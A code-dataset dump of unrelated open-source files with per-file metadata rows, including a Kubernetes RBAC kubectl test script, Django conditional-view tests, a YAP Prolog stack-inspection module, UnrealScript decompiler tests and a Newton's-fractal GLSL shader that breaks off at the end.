EXPECT_EQ(base::nullopt, gen.GetNext());
}
} // namespace internal
} // namespace v8
| C++ | 4 | EXHades/v8 | test/unittests/heap/index-generator-unittest.cc | [
"BSD-3-Clause"
] |
prefix=@PROJECT_SPACE_DIR
Name: @(CATKIN_PACKAGE_PREFIX + PROJECT_NAME)
Description: Description of @PROJECT_NAME
Version: @PROJECT_VERSION
Cflags: @(' '.join(['-I%s' % include for include in PROJECT_PKG_CONFIG_INCLUDE_DIRS]))
Libs: -L${prefix}/lib @(' '.join(PKG_CONFIG_LIBRARIES_WITH_PREFIX))
Requires: @(PROJECT_CATKIN_DEPENDS)
| EmberScript | 3 | nnsuite/tizenport-ros-catkin | cmake/em/pkg.pc.em | [
"BSD-3-Clause"
] |
syntax = "proto3";
package proto_example.common.items;
enum ItemType {
DEFAULT = 0;
SUPERIOR = 1;
FLAWLESS = 2;
} | Protocol Buffer | 4 | SuperHuangXu/nest | integration/microservices/src/grpc-advanced/proto/common/item_types.proto | [
"MIT"
] |
let $nodeKey := sdb:nodekey(.=>foo[[2]])
let $xml :=
<xml>
<bar>
<hello>world</hello>
<helloo>true</helloo>
</bar>
<baz>hello</baz>
<foo>
<element>bar</element>
<element null="true"/>
<element>2.33</element>
</foo>
<tada>
<element>
<foo>bar</foo>
</element>
<element>
<baz>false</baz>
</element>
<element>boo</element>
<element/>
<element/>
</tada>
</xml>
return {"nodeKey": $nodeKey}
| XQuery | 3 | JohannesLichtenberger/sirix | bundles/sirix-kotlin-cli/src/test/resources/org/sirix/cli/commands/test.xq | [
"BSD-3-Clause"
] |
class Labels extends Object;
// We use the assert statement, i.e. "assert (condition);" here as a code filler.
function TestSwitchNesting()
{
switch (true)
{
case true:
case false:
case true:
break;
case false:
break;
default:
break;
}
}
/**
* Test jump nesting case where a switch with a default case is missing a close of its outer nest.
*/
function TestIfAndSwitchWithDefaultNesting()
{
if (true) // We are testing for this nesting block.
{
if (true)
{
switch (true)
{
case true:
assert (true);
default:
assert (true);
}
}
}
if (true)
{
return;
}
}
function TestIfAndSwitchWithEmptyNesting()
{
if (true)
{
if (true)
{
switch (true)
{
// FIXME: With empty rules, we run into decompile issues
case true:
default:
}
}
}
if (true)
{
return;
}
}
// Issue: The if is closed with along with a nesting block.
function TestSwitchAndCaseWithIfNesting()
{
switch (true)
{
case true:
if (true)
{
assert (true);
break;
}
default:
return;
}
}
function TestSwitchAndCaseWithLabels()
{
switch (true)
{
case true:
if (true)
{
assert (true);
goto Case2;
}
break;
case false:
if (true)
{
assert (true);
break;
}
Case2:
default:
assert (true);
}
}
function TestForAndIfWithElse()
{
local int i;
for (i = 0; i < 0xFF; i++)
{
if (true)
{
if (false)
{
assert (true);
}
else
{
assert (true);
if (false)
{
assert (true);
continue;
}
}
}
assert (true);
}
assert (true);
}
function TestIfWithGoto()
{
if (true)
{
assert (true);
if (true)
{
assert (true);
if (true)
{
assert (true);
goto NextLabel;
}
}
}
NextLabel:
if (false)
{
}
else
{
assert (true);
if (false)
{
assert (true);
}
else
{
assert (false);
}
}
}
function TestIfAndWhileLoopLabel()
{
if (false)
{
}
else
{
}
// We expect a loop label here.
while (true)
{
}
}
function TestForLoop()
{
local int i;
for (i = 0; i < 0xFF; ++i)
{
assert (false);
}
}
function TestWhileLoop()
{
while (true)
{
assert (false);
}
}
function TestDoUntilLoop()
{
do
{
assert (true);
} until (true);
} | UnrealScript | 2 | LaudateCorpus1/Unreal-Library | Test/upk/TestUC2/Classes/Labels.uc | [
"MIT"
] |
// Copyright 2010-2013 RethinkDB, all rights reserved.
#ifndef EXTPROC_JS_RUNNER_HPP_
#define EXTPROC_JS_RUNNER_HPP_
#include <string>
#include <vector>
#include <set>
#include "errors.hpp"
#include <boost/variant.hpp>
#include "containers/scoped.hpp"
#include "containers/counted.hpp"
#include "rdb_protocol/datum.hpp"
#include "concurrency/wait_any.hpp"
#include "arch/timing.hpp"
#include "extproc/extproc_job.hpp"
// Unique ids used to refer to objects on the JS side.
typedef uint64_t js_id_t;
const js_id_t INVALID_ID = 0;
// JS calls result either in a DATUM return value, a function id (which we can
// use to call the function later), or an error string
typedef boost::variant<ql::datum_t, js_id_t, std::string> js_result_t;
class extproc_pool_t;
class js_runner_t;
class js_job_t;
class js_timeout_sentry_t;
// A handle to a running "javascript evaluator" job.
class js_runner_t : public home_thread_mixin_t {
public:
js_runner_t();
~js_runner_t();
bool connected() const;
// Used for worker configuration
struct req_config_t {
uint64_t timeout_ms;
};
void begin(extproc_pool_t *pool,
signal_t *interruptor,
const ql::configured_limits_t &limits);
void end();
// Evalute JS source string to either a value or a function ID to call later
js_result_t eval(const std::string &source,
const req_config_t &config);
// Calls a previously compiled function.
js_result_t call(const std::string &source,
const std::vector<ql::datum_t> &args,
const req_config_t &config);
private:
static const size_t CACHE_SIZE;
void cache_id(js_id_t id, const std::string &source);
void trim_cache();
// Invalidates an ID, dereferencing the object it refers to in the
// javascript evaluator process.
void release_id(js_id_t id);
class job_data_t;
scoped_ptr_t<job_data_t> job_data;
DISABLE_COPYING(js_runner_t);
};
#endif /* EXTPROC_JS_RUNNER_HPP_ */
| C++ | 4 | zadcha/rethinkdb | src/extproc/js_runner.hpp | [
"Apache-2.0"
] |
#!/usr/bin/env bash
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
run_clusterroles_tests() {
set -o nounset
set -o errexit
create_and_use_new_namespace
kube::log::status "Testing clusterroles"
# make sure the server was properly bootstrapped with clusterroles and bindings
kube::test::get_object_assert clusterroles/cluster-admin "{{.metadata.name}}" 'cluster-admin'
kube::test::get_object_assert clusterrolebindings/cluster-admin "{{.metadata.name}}" 'cluster-admin'
# Pre-condition: no ClusterRole pod-admin exists
output_message=$(! kubectl get clusterrole pod-admin 2>&1 "${kube_flags[@]:?}")
kube::test::if_has_string "${output_message}" 'clusterroles.rbac.authorization.k8s.io "pod-admin" not found'
# Dry-run test `kubectl create clusterrole`
kubectl create "${kube_flags[@]:?}" clusterrole pod-admin --dry-run=client --verb=* --resource=pods
kubectl create "${kube_flags[@]:?}" clusterrole pod-admin --dry-run=server --verb=* --resource=pods
output_message=$(! kubectl get clusterrole pod-admin 2>&1 "${kube_flags[@]:?}")
kube::test::if_has_string "${output_message}" 'clusterroles.rbac.authorization.k8s.io "pod-admin" not found'
# test `kubectl create clusterrole`
kubectl create "${kube_flags[@]:?}" clusterrole pod-admin --verb=* --resource=pods
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" '\*:'
output_message=$(kubectl delete clusterrole pod-admin -n test 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" 'warning: deleting cluster-scoped resources'
kube::test::if_has_string "${output_message}" 'clusterrole.rbac.authorization.k8s.io "pod-admin" deleted'
kubectl create "${kube_flags[@]}" clusterrole pod-admin --verb=* --resource=pods
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" '\*:'
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert clusterrole/pod-admin "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
kubectl create "${kube_flags[@]}" clusterrole resource-reader --verb=get,list --resource=pods,deployments.apps
kube::test::get_object_assert clusterrole/resource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:get:list:'
kube::test::get_object_assert clusterrole/resource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:deployments:'
kube::test::get_object_assert clusterrole/resource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':apps:'
kubectl create "${kube_flags[@]}" clusterrole resourcename-reader --verb=get,list --resource=pods --resource-name=foo
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
kube::test::get_object_assert clusterrole/resourcename-reader "{{range.rules}}{{range.resourceNames}}{{.}}:{{end}}{{end}}" 'foo:'
kubectl create "${kube_flags[@]}" clusterrole url-reader --verb=get --non-resource-url=/logs/* --non-resource-url=/healthz/*
kube::test::get_object_assert clusterrole/url-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:'
kube::test::get_object_assert clusterrole/url-reader "{{range.rules}}{{range.nonResourceURLs}}{{.}}:{{end}}{{end}}" '/logs/\*:/healthz/\*:'
kubectl create "${kube_flags[@]}" clusterrole aggregation-reader --aggregation-rule="foo1=foo2"
kube::test::get_object_assert clusterrole/aggregation-reader "{{${id_field:?}}}" 'aggregation-reader'
# Pre-condition: no ClusterRoleBinding super-admin exists
output_message=$(! kubectl get clusterrolebinding super-admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" 'clusterrolebindings.rbac.authorization.k8s.io "super-admin" not found'
# Dry-run test `kubectl create clusterrolebinding`
kubectl create "${kube_flags[@]}" clusterrolebinding super-admin --dry-run=client --clusterrole=admin --user=super-admin
kubectl create "${kube_flags[@]}" clusterrolebinding super-admin --dry-run=server --clusterrole=admin --user=super-admin
output_message=$(! kubectl get clusterrolebinding super-admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" 'clusterrolebindings.rbac.authorization.k8s.io "super-admin" not found'
# test `kubectl create clusterrolebinding`
# test `kubectl set subject clusterrolebinding`
kubectl create "${kube_flags[@]}" clusterrolebinding super-admin --clusterrole=admin --user=super-admin
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:'
kubectl set subject --dry-run=client "${kube_flags[@]}" clusterrolebinding super-admin --user=foo
kubectl set subject --dry-run=server "${kube_flags[@]}" clusterrolebinding super-admin --user=foo
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:'
kubectl set subject "${kube_flags[@]}" clusterrolebinding super-admin --user=foo
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:foo:'
kubectl create "${kube_flags[@]}" clusterrolebinding multi-users --clusterrole=admin --user=user-1 --user=user-2
kube::test::get_object_assert clusterrolebinding/multi-users "{{range.subjects}}{{.name}}:{{end}}" 'user-1:user-2:'
kubectl create "${kube_flags[@]}" clusterrolebinding super-group --clusterrole=admin --group=the-group
kube::test::get_object_assert clusterrolebinding/super-group "{{range.subjects}}{{.name}}:{{end}}" 'the-group:'
kubectl set subject "${kube_flags[@]}" clusterrolebinding super-group --group=foo
kube::test::get_object_assert clusterrolebinding/super-group "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:'
kubectl create "${kube_flags[@]}" clusterrolebinding multi-groups --clusterrole=admin --group=group-1 --group=group-2
kube::test::get_object_assert clusterrolebinding/multi-groups "{{range.subjects}}{{.name}}:{{end}}" 'group-1:group-2:'
kubectl create "${kube_flags[@]}" clusterrolebinding super-sa --clusterrole=admin --serviceaccount=otherns:sa-name
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:'
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:'
kubectl set subject "${kube_flags[@]}" clusterrolebinding super-sa --serviceaccount=otherfoo:foo
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:otherfoo:'
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:'
# test `kubectl set subject clusterrolebinding --all`
kubectl set subject "${kube_flags[@]}" clusterrolebinding --all --user=test-all-user
kube::test::get_object_assert clusterrolebinding/super-admin "{{range.subjects}}{{.name}}:{{end}}" 'super-admin:foo:test-all-user:'
kube::test::get_object_assert clusterrolebinding/super-group "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:test-all-user:'
kube::test::get_object_assert clusterrolebinding/super-sa "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:test-all-user:'
# test `kubectl create rolebinding`
# test `kubectl set subject rolebinding`
kubectl create "${kube_flags[@]}" rolebinding admin --dry-run=client --clusterrole=admin --user=default-admin
kubectl create "${kube_flags[@]}" rolebinding admin --dry-run=server --clusterrole=admin --user=default-admin
output_message=$(! kubectl get rolebinding/admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" ' not found'
kubectl create "${kube_flags[@]}" rolebinding admin --clusterrole=admin --user=default-admin
kube::test::get_object_assert rolebinding/admin "{{.roleRef.kind}}" 'ClusterRole'
kube::test::get_object_assert rolebinding/admin "{{range.subjects}}{{.name}}:{{end}}" 'default-admin:'
kubectl set subject "${kube_flags[@]}" rolebinding admin --user=foo
kube::test::get_object_assert rolebinding/admin "{{range.subjects}}{{.name}}:{{end}}" 'default-admin:foo:'
kubectl create "${kube_flags[@]}" rolebinding localrole --role=localrole --group=the-group
kube::test::get_object_assert rolebinding/localrole "{{.roleRef.kind}}" 'Role'
kube::test::get_object_assert rolebinding/localrole "{{range.subjects}}{{.name}}:{{end}}" 'the-group:'
kubectl set subject "${kube_flags[@]}" rolebinding localrole --group=foo
kube::test::get_object_assert rolebinding/localrole "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:'
kubectl create "${kube_flags[@]}" rolebinding sarole --role=localrole --serviceaccount=otherns:sa-name
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:'
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:'
kubectl set subject "${kube_flags[@]}" rolebinding sarole --serviceaccount=otherfoo:foo
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.namespace}}:{{end}}" 'otherns:otherfoo:'
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:'
# test `kubectl set subject rolebinding --all`
kubectl set subject "${kube_flags[@]}" rolebinding --all --user=test-all-user
kube::test::get_object_assert rolebinding/admin "{{range.subjects}}{{.name}}:{{end}}" 'default-admin:foo:test-all-user:'
kube::test::get_object_assert rolebinding/localrole "{{range.subjects}}{{.name}}:{{end}}" 'the-group:foo:test-all-user:'
kube::test::get_object_assert rolebinding/sarole "{{range.subjects}}{{.name}}:{{end}}" 'sa-name:foo:test-all-user:'
# Describe command should respect the chunk size parameter
kube::test::describe_resource_chunk_size_assert clusterrolebindings
kube::test::describe_resource_chunk_size_assert clusterroles
set +o nounset
set +o errexit
}
run_role_tests() {
set -o nounset
set -o errexit
create_and_use_new_namespace
kube::log::status "Testing role"
# Dry-run create
kubectl create "${kube_flags[@]}" role pod-admin --dry-run=client --verb=* --resource=pods
kubectl create "${kube_flags[@]}" role pod-admin --dry-run=server --verb=* --resource=pods
output_message=$(! kubectl get role/pod-admin 2>&1 "${kube_flags[@]}")
kube::test::if_has_string "${output_message}" ' not found'
# Create Role from command (only resource)
kubectl create "${kube_flags[@]}" role pod-admin --verb=* --resource=pods
kube::test::get_object_assert role/pod-admin "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" '\*:'
kube::test::get_object_assert role/pod-admin "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert role/pod-admin "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
output_message=$(! kubectl create "${kube_flags[@]}" role invalid-pod-admin --verb=* --resource=invalid-resource 2>&1)
kube::test::if_has_string "${output_message}" "the server doesn't have a resource type \"invalid-resource\""
# Create Role from command (resource + group)
kubectl create "${kube_flags[@]}" role group-reader --verb=get,list --resource=deployments.apps
kube::test::get_object_assert role/group-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/group-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'deployments:'
kube::test::get_object_assert role/group-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" 'apps:'
output_message=$(! kubectl create "${kube_flags[@]}" role invalid-group --verb=get,list --resource=deployments.invalid-group 2>&1)
kube::test::if_has_string "${output_message}" "the server doesn't have a resource type \"deployments\" in group \"invalid-group\""
# Create Role from command (resource / subresource)
kubectl create "${kube_flags[@]}" role subresource-reader --verb=get,list --resource=pods/status
kube::test::get_object_assert role/subresource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/subresource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods/status:'
kube::test::get_object_assert role/subresource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
# Create Role from command (resource + group / subresource)
kubectl create "${kube_flags[@]}" role group-subresource-reader --verb=get,list --resource=replicasets.apps/scale
kube::test::get_object_assert role/group-subresource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/group-subresource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'replicasets/scale:'
kube::test::get_object_assert role/group-subresource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" 'apps:'
output_message=$(! kubectl create "${kube_flags[@]}" role invalid-group --verb=get,list --resource=rs.invalid-group/scale 2>&1)
kube::test::if_has_string "${output_message}" "the server doesn't have a resource type \"rs\" in group \"invalid-group\""
# Create Role from command (resource + resourcename)
kubectl create "${kube_flags[@]}" role resourcename-reader --verb=get,list --resource=pods --resource-name=foo
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:'
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods:'
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':'
kube::test::get_object_assert role/resourcename-reader "{{range.rules}}{{range.resourceNames}}{{.}}:{{end}}{{end}}" 'foo:'
# Create Role from command (multi-resources)
kubectl create "${kube_flags[@]}" role resource-reader --verb=get,list --resource=pods/status,deployments.apps
kube::test::get_object_assert role/resource-reader "{{range.rules}}{{range.verbs}}{{.}}:{{end}}{{end}}" 'get:list:get:list:'
kube::test::get_object_assert role/resource-reader "{{range.rules}}{{range.resources}}{{.}}:{{end}}{{end}}" 'pods/status:deployments:'
kube::test::get_object_assert role/resource-reader "{{range.rules}}{{range.apiGroups}}{{.}}:{{end}}{{end}}" ':apps:'
# Describe command should respect the chunk size parameter
kube::test::describe_resource_chunk_size_assert roles
kube::test::describe_resource_chunk_size_assert rolebindings
set +o nounset
set +o errexit
}
| Shell | 5 | 767829413/kubernetes | test/cmd/rbac.sh | [
"Apache-2.0"
] |
/**
* @file library/hacks.yap
* @author VITOR SANTOS COSTA <vsc@VITORs-MBP.lan>
* @date Tue Nov 17 19:00:25 2015
*
* @brief Prolog hacking
*
*
*/
:- module(yap_hacks, [
current_choicepoint/1,
parent_choicepoint/1,
parent_choicepoint/2,
cut_by/1,
cut_at/1,
current_choicepoints/1,
choicepoint/7,
current_continuations/1,
continuation/4,
stack_dump/0,
stack_dump/1,
enable_interrupts/0,
disable_interrupts/0,
virtual_alarm/3,
alarm/3,
fully_strip_module/3,
context_variables/1
]).
/**
* @addtogroup Hacks
* @{
* @brief Manipulate the Prolog stacks, including setting and resetting
* choice-points.
*
**/
/**
* @pred stack_dump
*
* Write the current ancestor stack to the outout. Ancestors may have:
* - terminated
* - still have sub-goals to execute, if so, they left an _environment_
* - still have clauses they may nacktrack to; if so, they left a _choice point_
*
*/
stack_dump :-
stack_dump(-1).
/**
* @pred stack_dump(+N)
*
* Report the last _N_ entries in the stack (see stack_dump/0)
*/
stack_dump(Max) :-
current_choicepoints(CPs),
current_continuations([Env|Envs]),
continuation(Env,_,ContP,_),
length(CPs, LCPs),
length(Envs, LEnvs),
format(user_error,'~n~n~tStack Dump~t~40+~n~nAddress~tChoiceP~16+ Cur/Next Clause Goal~n',[LCPs,LEnvs]),
'$hacks':display_stack_info(CPs, Envs, Max, ContP, StackInfo, []),
run_formats(StackInfo, user_error).
run_formats([], _).
run_formats([Com-Args|StackInfo], Stream) :-
format(Stream, Com, Args),
run_formats(StackInfo, user_error).
/**
* @pred virtual_alarm(+Interval, 0:Goal, -Left)
*
* Activate an alarm to execute _Goal_ in _Interval_ seconds. If the alarm was active,
* bind _Left_ to the previous value.
*
* If _Interval_ is 0, disable the current alarm.
*/
virtual_alarm(Interval, Goal, Left) :-
Interval == 0, !,
'$virtual_alarm'(0, 0, Left0, _),
on_signal(sig_vtalarm, _, Goal),
Left = Left0.
virtual_alarm(Interval, Goal, Left) :-
integer(Interval), !,
on_signal(sig_vtalarm, _, Goal),
'$virtual_alarm'(Interval, 0, Left, _).
virtual_alarm([Interval|USecs], Goal, [Left|LUSecs]) :-
on_signal(sig_vtalarm, _, Goal),
'$virtual_alarm'(Interval, USecs, Left, LUSecs).
%% @}
| Prolog | 5 | KuroLevin/yap-6.3 | library/hacks.yap | [
"Artistic-1.0-Perl",
"ClArtistic"
] |
<script>
...
<?php
foreach($actID AS $act) {
echo 'divNames.push(\'[nid='.$act.']\');';
}
?>
...
</script> | PHP | 2 | sbj42/vscode | extensions/vscode-colorize-tests/test/colorize-fixtures/issue-28354.php | [
"MIT"
] |
==== Pros and Cons ====
~+: high performance in SMP environments%%%
~+: no thread contention in Java%%%
~-: cache update can loose some entries%%%
~-: still some thread contention in Ada but limited to copying a reference ~(C.Set~)
| Creole | 0 | jquorning/ada-wiki | regtests/expect/wiki-convert/break.creole | [
"Apache-2.0"
] |
from django.http import HttpResponse
from django.views.decorators.http import condition, etag, last_modified
from .tests import ETAG, FULL_RESPONSE, LAST_MODIFIED, WEAK_ETAG
@condition(lambda r: ETAG, lambda r: LAST_MODIFIED)
def index(request):
return HttpResponse(FULL_RESPONSE)
@condition(last_modified_func=lambda r: LAST_MODIFIED)
def last_modified_view1(request):
return HttpResponse(FULL_RESPONSE)
@last_modified(lambda r: LAST_MODIFIED)
def last_modified_view2(request):
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: ETAG)
def etag_view1(request):
return HttpResponse(FULL_RESPONSE)
@etag(lambda r: ETAG)
def etag_view2(request):
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: ETAG.strip('"'))
def etag_view_unquoted(request):
"""
Use an etag_func() that returns an unquoted ETag.
"""
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: WEAK_ETAG)
def etag_view_weak(request):
"""
Use an etag_func() that returns a weak ETag.
"""
return HttpResponse(FULL_RESPONSE)
@condition(etag_func=lambda r: None)
def etag_view_none(request):
"""
Use an etag_func() that returns None, as opposed to setting etag_func=None.
"""
return HttpResponse(FULL_RESPONSE)
| Python | 5 | jpmallarino/django | tests/conditional_processing/views.py | [
"BSD-3-Clause",
"0BSD"
] |
#!/usr/bin/env bash
set -eu -o pipefail
readonly safeBranchName="$(echo $1 | sed 's/^pull\//pr/' | sed 's/[^A-Za-z0-9_.-]/_/g')"
readonly shortLastSha="$(git rev-parse --short $2)"
readonly inputDir="$PROJECT_ROOT/$3"
readonly outputDir="$PROJECT_ROOT/$4"
readonly fileSuffix="-$safeBranchName-$shortLastSha.tgz"
echo "Creating compressed archives for packages in '$inputDir'."
# Create or clean-up the output directory.
echo " Preparing output directory: $outputDir"
rm -rf "$outputDir"
mkdir -p "$outputDir"
# If there are more than one packages in `$inputDir`...
if [[ $(ls -1 "$inputDir" | wc -l) -gt 1 ]]; then
# Create a compressed archive containing all packages.
# (This is useful for copying all packages into `node_modules/` (without changing `package.json`).)
outputFileName=all$fileSuffix
echo " Creating archive with all packages --> '$outputFileName'..."
tar --create --gzip --directory "$inputDir" --file "$outputDir/$outputFileName" --transform s/^\./packages/ .
fi
# Create a compressed archive for each package.
# (This is useful for referencing the path/URL to the resulting archive in `package.json`.)
for dir in $inputDir/*
do
packageName=`basename "$dir"`
outputFileName="$packageName$fileSuffix"
outputFilePath="$outputDir/$outputFileName"
echo " Processing package '$packageName' --> '$outputFileName'..."
tar --create --gzip --directory "$dir" --file "$outputFilePath" --transform s/^\./package/ .
done
echo "Done creating compressed archives."
| Shell | 4 | duluca/angular | scripts/ci/create-package-archives.sh | [
"MIT"
] |
1471363607304 1 1 0
1471363641847 1 1 0
1471363676458 1 1 0
1471363711106 3 3 348
1471363745953 3 3 348
1471363780623 3 3 348
1471363815046 3 3 348
1471363849590 3 3 27
| IDL | 0 | cegonse/tfm | stats/hpa_2016-08-16T16:11:15.067Z.dlm | [
"MIT"
] |
@import url("//unpkg.com/xyz/test.css");
| CSS | 0 | acidburn0zzz/parcel | packages/core/integration-tests/test/integration/html-protocol-relative/index.css | [
"MIT"
] |
describe("should be able to return Int value through two levels of generic functions", ||
v := kablooey(Int)
expect(42, v)
)
// support code
blooey: func <T> (T: Class) -> T {
match T {
case Int => 42
}
}
kablooey: func <T> (T: Class) -> T {
blooey(T)
}
| ooc | 4 | shamanas/rock | test/compiler/functions/generic-return2.ooc | [
"MIT"
] |
#version 330
uniform vec3 light_source_position;
uniform float gloss;
uniform float shadow;
uniform float focal_distance;
uniform vec4 color0;
uniform vec4 color1;
uniform vec4 color2;
uniform vec4 color3;
uniform vec4 color4;
uniform vec2 coef0;
uniform vec2 coef1;
uniform vec2 coef2;
uniform vec2 coef3;
uniform vec2 coef4;
uniform vec2 coef5;
uniform vec2 root0;
uniform vec2 root1;
uniform vec2 root2;
uniform vec2 root3;
uniform vec2 root4;
uniform float n_roots;
uniform float n_steps;
uniform float julia_highlight;
uniform float saturation_factor;
uniform float black_for_cycles;
uniform float is_parameter_space;
uniform vec2 frame_shape;
in vec3 xyz_coords;
out vec4 frag_color;
#INSERT finalize_color.glsl
#INSERT complex_functions.glsl
const int MAX_DEGREE = 5;
const float CLOSE_ENOUGH = 1e-3;
vec2 poly(vec2 z, vec2[MAX_DEGREE + 1] coefs){
vec2 result = vec2(0.0);
for(int n = 0; n < int(n_roots) + 1; n++){
result += complex_mult(coefs[n], complex_pow(z, n));
}
return result;
}
vec2 dpoly(vec2 z, vec2[MAX_DEGREE + 1] coefs){
vec2 result = vec2(0.0);
for(int n = 1; n < int(n_roots) + 1; n++){
result += n * complex_mult(coefs[n], complex_pow(z, n - 1));
}
return result;
}
vec2 seek_root(vec2 z, vec2[MAX_DEGREE + 1] coefs, int max_steps, out float n_iters){
float last_len;
float curr_len;
float threshold = CLOSE_ENOUGH;
for(int i = 0; i < max_steps; i++){
last_len = curr_len;
n_iters = float(i);
vec2 step = complex_div(poly(z, coefs), dpoly(z, coefs));
curr_len = length(step);
if(curr_len < threshold){
break;
}
z = z - step;
}
n_iters -= clamp((threshold - curr_len) / (last_len - curr_len), 0.0, 1.0);
return z;
}
void main() {
vec2[MAX_DEGREE + 1] coefs = vec2[MAX_DEGREE + 1](coef0, coef1, coef2, coef3, coef4, coef5);
vec2[MAX_DEGREE] roots = vec2[MAX_DEGREE](root0, root1, root2, root3, root4);
vec4[MAX_DEGREE] colors = vec4[MAX_DEGREE](color0, color1, color2, color3, color4);
vec2 z = xyz_coords.xy;
if(is_parameter_space > 0){
// In this case, pixel should correspond to one of the roots
roots[2] = xyz_coords.xy;
vec2 r0 = roots[0];
vec2 r1 = roots[1];
vec2 r2 = roots[2];
// It is assumed that the polynomial is cubid...
coefs[0] = -complex_mult(complex_mult(r0, r1), r2);
coefs[1] = complex_mult(r0, r1) + complex_mult(r0, r2) + complex_mult(r1, r2);
coefs[2] = -(r0 + r1 + r2);
coefs[3] = vec2(1.0, 0.0);
// Seed value is always center of the roots
z = -coefs[2] / 3.0;
}
float n_iters;
vec2 found_root = seek_root(z, coefs, int(n_steps), n_iters);
vec4 color = vec4(0.0);
float min_dist = 1e10;
float dist;
for(int i = 0; i < int(n_roots); i++){
dist = distance(roots[i], found_root);
if(dist < min_dist){
min_dist = dist;
color = colors[i];
}
}
color *= 1.0 + (0.01 * saturation_factor) * (n_iters - 5 * saturation_factor);
if(black_for_cycles > 0 && min_dist > CLOSE_ENOUGH){
color = vec4(0.0, 0.0, 0.0, 1.0);
}
if(julia_highlight > 0.0){
float radius = julia_highlight;
vec2[4] samples = vec2[4](
z + vec2(radius, 0.0),
z + vec2(-radius, 0.0),
z + vec2(0.0, radius),
z + vec2(0.0, -radius)
);
for(int i = 0; i < 4; i++){
for(int j = 0; j < n_steps; j++){
vec2 z = samples[i];
z = z - complex_div(poly(z, coefs), dpoly(z, coefs));
samples[i] = z;
}
}
float max_dist = 0.0;
for(int i = 0; i < 4; i++){
max_dist = max(max_dist, distance(samples[i], samples[(i + 1) % 4]));
}
color *= 1.0 * smoothstep(0, 0.1, max_dist);
}
frag_color = finalize_color(
color,
xyz_coords,
vec3(0.0, 0.0, 1.0),
light_source_position,
gloss,
shadow
);
